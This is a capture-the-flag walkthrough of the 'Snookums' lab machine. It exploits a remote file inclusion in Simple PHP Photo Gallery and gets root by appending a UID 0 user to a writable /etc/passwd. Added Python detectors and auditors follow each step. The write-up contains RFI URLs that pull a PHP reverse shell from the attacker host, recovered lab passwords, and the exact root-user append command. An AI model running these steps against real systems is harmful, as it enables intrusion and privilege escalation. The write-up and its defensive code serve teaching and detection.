# Snookums

## Nmap

```
sudo nmap 192.168.230.58 -p- -sS -sV

PORT      STATE SERVICE     VERSION
21/tcp    open  ftp         vsftpd 3.0.2
22/tcp    open  ssh         OpenSSH 7.4 (protocol 2.0)
80/tcp    open  http        Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
111/tcp   open  rpcbind     2-4 (RPC #100000)
139/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: SAMBA)
445/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: SAMBA)
3306/tcp  open  mysql       MySQL (unauthorized)
33060/tcp open  mysqlx?
Service Info: Host: SNOOKUMS; OS: Unix
```

Port 80 redirects to index.php, which serves Simple PHP Photo Gallery. The page footer shows the installed version as v08.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-26cc1922efe4864607f1053ae18fb356fe92dafc%2Fimage.png?alt=media)

Running `dirsearch.py` against the target website produces the following found directories:

```
python3 dirsearch.py -u http://192.168.230.58 -w /usr/share/seclists/Discovery/Web-Content/big.txt -r -t 60 --full-url
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-28a3602bd70c543f5ad8fb264bd9c7a3513d307f%2Fimage.png?alt=media)

After manual inspection, none of the discovered directories are of particular interest. A Google search for exploits turns up a public RFI exploit for v0.7.

{% embed url="https://www.exploit-db.com/exploits/48424" %}

As per the exploit page, the PoC for this is:

```
site.com/image.php?img=[ PAYLOAD ]
```

Browsing to image.php shows the following:

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-12ad0212004a38b15dfb45f10ec709901e2a9b02%2Fimage.png?alt=media)

From here we can test for RFI by starting a Python `SimpleHTTPServer` on our attacking machine and browsing to a test.txt file hosted there whose contents are 'hello'.

```
http://192.168.230.58/image.php?img=http://192.168.49.230/test.txt
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-6489ce96905e80a4327957e4fcc7ef8a73abe821%2Fimage.png?alt=media)

Since this worked and we know the target is running PHP, we can attempt a PHP reverse shell. I configured a PHP reverse shell to call back to a listener on port 21, then browsed to it at:

```
http://192.168.230.58/image.php?img=http://192.168.49.230/phpshell.php
```

This resulted in a shell.
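The requests above leave a clear trace in the web server's access log, and the underlying bug is `image.php` passing `img` to an include without restricting it. The following is an added example, not code from the original write-up or from Simple PHP Photo Gallery: it parses Apache combined-format log lines (constructed here to mirror the requests made above), flags inclusion-style parameter values, and shows the path confinement a fixed `image.php` would apply. The regex, prefix lists and function names are assumptions, not signatures from any product.

```python
"""Flag remote/local file inclusion attempts against image.php in Apache
combined-format access logs, and show the path check image.php should apply.

Added example, not part of the original write-up or of Simple PHP Photo Gallery.
The log lines are constructed to mirror the requests made above; the regex,
prefix lists and function names are assumptions, not signatures from any product.
"""
import os
import re
from typing import List, Optional
from urllib.parse import parse_qs, urlsplit

# Apache combined format: ip ident user [time] "METHOD path PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

REMOTE_SCHEMES = ("http://", "https://", "ftp://")            # only work with allow_url_include=On
STREAM_WRAPPERS = ("php://", "data:", "expect://", "file://")  # local wrappers abused in LFI

# Constructed sample: one legitimate request, the 'hello' test fetch, the shell fetch,
# and a traversal probe.
SAMPLE_LOG = """\
192.168.49.230 - - [10/Jan/2024:10:00:01 +0000] "GET /image.php?img=photos/1.jpg HTTP/1.1" 200 5123
192.168.49.230 - - [10/Jan/2024:10:00:05 +0000] "GET /image.php?img=http://192.168.49.230/test.txt HTTP/1.1" 200 6
192.168.49.230 - - [10/Jan/2024:10:00:09 +0000] "GET /image.php?img=http://192.168.49.230/phpshell.php HTTP/1.1" 200 0
192.168.49.230 - - [10/Jan/2024:10:00:12 +0000] "GET /image.php?img=../../../../etc/passwd HTTP/1.1" 200 2410
"""


def classify_param(value: str) -> Optional[str]:
    """Return 'rfi', 'wrapper', 'lfi' or None for one percent-decoded parameter value."""
    v = value.strip().lower()
    if v.startswith(REMOTE_SCHEMES):
        return "rfi"
    if v.startswith(STREAM_WRAPPERS):
        return "wrapper"
    if "../" in v or "..\\" in v or v.startswith("/"):
        return "lfi"
    return None


def scan_log(text: str, watched=("img",)) -> List[dict]:
    """Parse each line and report requests whose watched parameter looks like an inclusion attack."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # unparsable line; a real scanner would count these separately
        url = urlsplit(m["path"])
        params = parse_qs(url.query, keep_blank_values=True)  # values arrive percent-decoded
        for name in watched:
            for value in params.get(name, []):
                kind = classify_param(value)
                if kind:
                    findings.append({"ip": m["ip"], "time": m["time"], "script": url.path,
                                     "param": name, "value": value, "kind": kind,
                                     "status": int(m["status"])})
    return findings


def resolve_local_image(base_dir: str, img: str) -> Optional[str]:
    """Mitigation side: confine the img parameter to base_dir before any include/readfile.
    Returns the resolved path, or None when the value must be rejected."""
    if not img or classify_param(img):
        return None
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, img))
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['time']} {f['ip']} {f['kind'].upper():7} {f['script']}?{f['param']}={f['value']}")
```

Running the script prints the three suspicious requests (two remote fetches and one traversal probe) and skips the legitimate `photos/1.jpg` request. On the server side, pairing a check like `resolve_local_image` with `allow_url_include=Off` in php.ini removes both the remote and the local variant of the bug.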

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-01ec35f7eaad1e7f9c8a152251937f8f429909df%2Fimage.png?alt=media)

Browsing /var/www/html shows a db.php file. Its contents give us the login credentials for MySQL.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-03737b7cc4bba0929726eae760bcfc955a7a50b4%2Fimage.png?alt=media)

Once logged into MySQL locally we can see a database called 'SimplePHPGal'. Selecting that database and listing its tables reveals a 'users' table. Selecting all columns from it gives us usernames and base64 values.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-4c60fc9c73329f643084e9370dd8eb9db4ec3a35%2Fimage.png?alt=media)

These values need to be base64-decoded twice to reveal the plaintext:

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-f5c444a855f811e0d85bce5778a85f3e993331b3%2Fimage.png?alt=media)

| Username | Password                |
| -------- | ----------------------- |
| josh     | MobilizeHissSeedtime747 |
| michael  | HockSydneyCertify123    |
| serena   | OverallCrestLean000     |
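Two base64 layers are an encoding, not a hash, so anyone who can read the table can recover every password. The following is an added example, not code from the original write-up: it peels nested base64 layers from a stored value until the result is printable text, and classifies each row as a real modular-crypt hash, a reversible encoding, or plaintext. The sample rows are constructed by double-encoding the plaintexts recovered above (the real column contents are not reproduced), and the hash-prefix list is an assumption.

```python
"""Peel nested base64 layers from a stored credential value and classify how a
'users' table protects its password column.

Added example, not part of the original write-up. The sample rows are
constructed here by double-encoding the plaintexts recovered above; the real
column contents are not reproduced. The hash-prefix list is an assumption.
"""
import base64
import binascii
import re
from typing import Dict, Tuple

# Modular-crypt prefixes that mark a one-way hash (md5crypt, bcrypt, sha256/512crypt,
# argon2, yescrypt, scrypt). Assumed list, not exhaustive.
HASH_PREFIX_RE = re.compile(r"^\$(1|2[aby]|5|6|argon2(?:id|i|d)|y|7)\$")
B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")


def peel_base64(value: str, max_layers: int = 8) -> Tuple[str, int]:
    """Decode base64 repeatedly while the output is still printable ASCII.

    Returns (innermost text, layers removed). A plaintext that happens to be
    valid base64 stops the loop only if decoding yields unprintable bytes, so
    short alphanumeric passwords are an inherent ambiguity of this heuristic.
    """
    current = value.strip()
    layers = 0
    while layers < max_layers and len(current) % 4 == 0 and B64_RE.match(current):
        try:
            text = base64.b64decode(current, validate=True).decode("ascii")
        except (binascii.Error, UnicodeDecodeError):
            break
        if not text or not text.isprintable():
            break
        current, layers = text, layers + 1
    return current, layers


def classify_storage(value: str) -> str:
    """'hashed' for a recognised modular-crypt hash, 'encoded' for reversible
    base64 layers, 'plaintext' for anything else."""
    if HASH_PREFIX_RE.match(value):
        return "hashed"
    return "encoded" if peel_base64(value)[1] else "plaintext"


def audit_users(rows: Dict[str, str]) -> Dict[str, Tuple[str, int, str]]:
    """Map username -> (storage kind, layers peeled, recoverable text or '')."""
    report = {}
    for user, stored in rows.items():
        kind = classify_storage(stored)
        if kind == "hashed":
            report[user] = (kind, 0, "")
        else:
            text, layers = peel_base64(stored)
            report[user] = (kind, layers, text)
    return report


def double_encode(plaintext: str) -> str:
    """Two base64 layers, mirroring what the 'users' table was observed to hold."""
    once = base64.b64encode(plaintext.encode()).decode()
    return base64.b64encode(once.encode()).decode()


# Constructed rows: the usernames and plaintexts from the table above, re-encoded.
SAMPLE_ROWS = {
    "josh": double_encode("MobilizeHissSeedtime747"),
    "michael": double_encode("HockSydneyCertify123"),
    "serena": double_encode("OverallCrestLean000"),
}

if __name__ == "__main__":
    for user, (kind, layers, text) in audit_users(SAMPLE_ROWS).items():
        print(f"{user:8} {kind:9} layers={layers} {text}")
```

Run against the constructed rows, every user is reported as `encoded` with two layers and the plaintext alongside; a row holding a `$6$...` or `$2b$...` value would be reported as `hashed` with nothing recoverable, which is the state a password column should be in.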

Viewing the contents of /etc/passwd shows two users of interest, michael and GitRekt.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-8037a4cb40b3521537c6e20ae486209e94e7cf86%2Fimage.png?alt=media)

We can then attempt to `SSH` in as michael with the candidate credentials.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-84cb651886b1e3dff98df401b615bb95e49505f2%2Fimage.png?alt=media)

Linpeas reports that /etc/passwd is writable by our user.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-811b97c54ae6f89161f196dde73eb94cddb8103d%2Fimage.png?alt=media)

Knowing this, we can append a new user with UID 0 to /etc/passwd.

Generate a password hash (MD5-crypt, via `-1`) on the attacking machine:

```
openssl passwd -1 -salt password password
```

Echo the new user, with that hash, onto the end of /etc/passwd on the target machine.

```
echo 'owned:$1$password$Da2mWXlxe6J7jtww12SNG/:0:0:owned:/root:/bin/bash' >> /etc/passwd
```

`su` to the new user:

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-985fd573b1a8babad096800efc15b3aca94de5fc%2Fimage.png?alt=media)
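The escalation depends on two conditions that are both easy to audit: /etc/passwd being writable by a non-root user, and a second UID 0 entry carrying its hash in the passwd file rather than in /etc/shadow. The following is an added example, not code from the original write-up or from linpeas: it checks the file's ownership and mode and parses its entries for exactly those conditions. The sample file content is constructed, with the last line reproducing the entry appended above; function names are assumptions.

```python
"""Audit an /etc/passwd file for the weaknesses this escalation relied on: a
file writable by non-root users, and extra UID-0 entries carrying a password
hash directly in the passwd file.

Added example, not part of the original write-up or of linpeas. The sample
file content is constructed; its last line reproduces the entry appended above.
Function names are assumptions.
"""
import os
import stat
from typing import List

SHADOWED_OR_LOCKED = ("x", "*", "!", "!!")

# Constructed sample: a small, normal passwd file with the write-up's line appended.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
michael:x:1000:1000::/home/michael:/bin/bash
GitRekt:x:1001:1001::/home/GitRekt:/bin/bash
owned:$1$password$Da2mWXlxe6J7jtww12SNG/:0:0:owned:/root:/bin/bash
"""


def audit_passwd_text(text: str) -> List[str]:
    """Return findings for passwd content: malformed lines, empty password fields,
    hashes stored outside /etc/shadow, and non-root accounts with UID 0."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append(f"line {lineno}: malformed entry with {len(fields)} fields")
            continue
        name, pw, uid, _gid, _gecos, _home, _shell = fields
        if pw == "":
            findings.append(f"line {lineno}: {name} has an empty password field")
        elif pw not in SHADOWED_OR_LOCKED:
            findings.append(f"line {lineno}: {name} stores a password hash in /etc/passwd, not /etc/shadow")
        if uid == "0" and name != "root":
            findings.append(f"line {lineno}: {name} has UID 0 (root-equivalent account)")
    return findings


def check_passwd_mode(path: str = "/etc/passwd") -> List[str]:
    """Flag ownership or permissions that let non-root users edit the file (expected root:root 0644)."""
    st = os.stat(path)
    findings = []
    if st.st_uid != 0:
        findings.append(f"{path} is owned by uid {st.st_uid}, not root")
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        findings.append(f"{path} is group- or world-writable ({stat.filemode(st.st_mode)})")
    return findings


if __name__ == "__main__":
    # On a live host: check the real file; the constructed sample is used for the demo below.
    with open("/etc/passwd") as fh:
        live = fh.read()
    for finding in check_passwd_mode() + audit_passwd_text(live):
        print("live:", finding)
    for finding in audit_passwd_text(SAMPLE_PASSWD):
        print("sample:", finding)
```

On the constructed sample the audit reports the `owned` entry twice, once for the inline hash and once for the duplicate UID 0; on a healthy host both lists are empty. Running `check_passwd_mode()` on the target would have flagged the same writable mode linpeas reported, and a file-integrity monitor watching /etc/passwd and /etc/shadow would catch the append itself.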
